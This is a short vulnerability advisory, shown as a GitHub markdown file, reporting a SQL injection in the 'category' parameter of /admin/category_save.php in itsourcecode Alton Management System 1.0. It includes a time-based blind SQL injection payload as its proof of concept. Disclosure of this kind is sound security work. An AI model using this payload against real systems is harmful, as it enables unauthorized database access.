Skip to content

Latest commit

 

History

History
27 lines (17 loc) · 714 Bytes

CVE8-3.md

File metadata and controls

27 lines (17 loc) · 714 Bytes
Raw

Vendor

itsourcecode

Product

Alton Management System

version

1.0

Download Source Code: https://itsourcecode.com/wp-content/uploads/2020/02/altonsystem.zip

Description

Log in as an administrator user, access the "/admin/category_save.php" page, and pass in the "category" parameter. Due to lax filtering, this parameter can lead to SQL injection vulnerabilities. image

Poc

Parameter: category (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: category=1' AND (SELECT 4315 FROM (SELECT(SLEEP(5)))UBMb) AND 'gUvK'='gUvK